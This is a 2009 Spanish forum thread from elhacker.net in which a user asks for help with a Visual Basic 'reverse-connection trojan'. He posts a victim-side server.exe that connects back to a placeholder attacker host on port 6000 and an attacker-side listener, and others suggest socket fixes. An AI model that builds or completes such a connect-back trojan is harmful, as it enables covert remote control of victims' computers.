elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Server no conecta, ayuda
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Server no conecta, ayuda  (Leído 2,700 veces)
fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Server no conecta, ayuda
« en: 31 Mayo 2009, 19:27 pm »

hola, bueno yo anteriormente postee sobre un problema con el Csocketmaster...parece que está solucionado

pero ahora me surgió otro problemam al hacer el troyano de conexion inversa (con los winsock) me funciona bien, pero al hacer el server y el cliente el servidor no conecta..

a ver si laguien me puede ayudar

server.exe (envia a la victima)
Código
  1. Option Explicit
  2. Dim WithEvents cliente As CSocketMaster
  3.  
  4. Private Sub Coneccion_Timer_Timer()
  5. If Not cliente.State = sckConnected Then
  6. cliente.CloseSck
  7. cliente.Connect cliente.RemoteHost, 6000
  8. End If
  9. End Sub
  10.  
  11. Private Sub Form_Load()
  12. Set cliente = New CSocketMaster
  13. cliente.CloseSck
  14. cliente.RemoteHost = "ip-o-dominio-no-ip"
  15. cliente.Connect cliente.RemoteHost, 6000
  16. End Sub
  17. Private Sub Label1_Click()
  18. If cliente.State = sckConnected Then
  19. Label1.Caption = "conectado"
  20. Else: Label1.Caption = "desconectado"
  21. End If
  22. End Sub

cliente.exe (atacante)
Código
  1. Option Explicit
  2. Dim WithEvents server As CSocketMaster
  3.  
  4. Private Sub Command1_Click()
  5. server.CloseSck
  6. server.Bind 6000
  7. server.Listen
  8. End Sub
  9. Private Sub Form_Load()
  10. Set server = New CSocketMaster
  11. End Sub
  12. Private Sub ws_ConnectionRequest(ByVal requestID As Long)
  13. server.CloseSck
  14. server.Accept requestID
  15. End Sub
  16.  

bueno el que tenga ganas de ayudar bienvenido sea  ;D

adios y gracias



En línea

somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: Server no conecta, ayuda
« Respuesta #1 en: 31 Mayo 2009, 20:53 pm »

Código
  1. server.CloseSck
  2. server.LocalPort = 6000
  3. server.Listen

Yo lo usaba así y me funcionaba :-\

Saludos ;D


En línea

fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: Server no conecta, ayuda
« Respuesta #2 en: 1 Junio 2009, 02:55 am »

MM ya lo probe y no funciona tampoco.. osea, el problema principal es la conexion,se que ahí hay algo mal, el archivo cliente escucha, pero el server no conecta.

gracias igualmente  ;D

adios
En línea

somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
50l3r


Desconectado Desconectado

Mensajes: 784


Solo se que se algo pero no me acuerdo


Ver Perfil WWW
Re: Server no conecta, ayuda
« Respuesta #3 en: 1 Junio 2009, 17:35 pm »

la duda que me planteo yo, son los pasos:

tienes que introducir los dos modulos

luego definirlo en cada formulario


 
la cosa es si hay que sustituir ademas del wsk.close al wsk.closesck algo mas

o solo hay que susituir eso?

luego la tipica cuestion de si se pude tener winsock en cliente y csocketmaster en servidor

gracias, asi nos solventamos las dudas completas todos  ;)
En línea

fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: Server no conecta, ayuda
« Respuesta #4 en: 1 Junio 2009, 19:30 pm »

Por favor si hay alguien que sepa de esto que nos de alguna solucion ya que hay varios interesados en cambiarnos a Cscoketmaster

por favoor ayuda y gracias a los que respondieron!

adios ;D
En línea

somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
carlitrosss6

Desconectado Desconectado

Mensajes: 18


You know you're right.


Ver Perfil
Re: Server no conecta, ayuda
« Respuesta #5 en: 3 Junio 2009, 01:29 am »

En el cliente estas usando un Winsock?.

Código:
Private Sub ws_ConnectionRequest(ByVal requestID As Long)
server.CloseSck
server.Accept requestID
End Sub

En ningùn lado veo el ws.Listen? Quieres usar el requestID del control ws para el cSocketmaster?.

Seguramente te falta poner tu control de Winsock (ws) en escucha (listen),porque asì nunca le llega un ConnectionRequest,y por ende nunca se conecta.

Espero sus respuestas para seguir  :D .
En línea

Arriba Mèxico!!
fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: Server no conecta, ayuda
« Respuesta #6 en: 5 Junio 2009, 00:45 am »

ya tengo solucionado ese tema igualemnte muchas gracias

adios
En línea

somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
50l3r


Desconectado Desconectado

Mensajes: 784


Solo se que se algo pero no me acuerdo


Ver Perfil WWW
Re: Server no conecta, ayuda
« Respuesta #7 en: 5 Junio 2009, 14:57 pm »

aun asi, viene bien siempre resovlerlas completamente para futuras dudas
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Server 2003 no conecta a servicios de red
Redes
ryan parker 3 4,409 Último mensaje 19 Septiembre 2011, 22:38 pm
por ryan parker
Counter se conecta directamente a un server
Juegos y Consolas
Fox_Neo 2 16,152 Último mensaje 6 Febrero 2013, 05:28 am
por el cordobes
Ayuda con Rat no conecta
Análisis y Diseño de Malware
FlowerTFP 8 4,529 Último mensaje 27 Septiembre 2015, 16:44 pm
por Eleкtro
MOVIDO: Ayuda con Rat no conecta
Programación General
Eleкtro 0 1,589 Último mensaje 26 Septiembre 2015, 17:13 pm
por Eleкtro
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines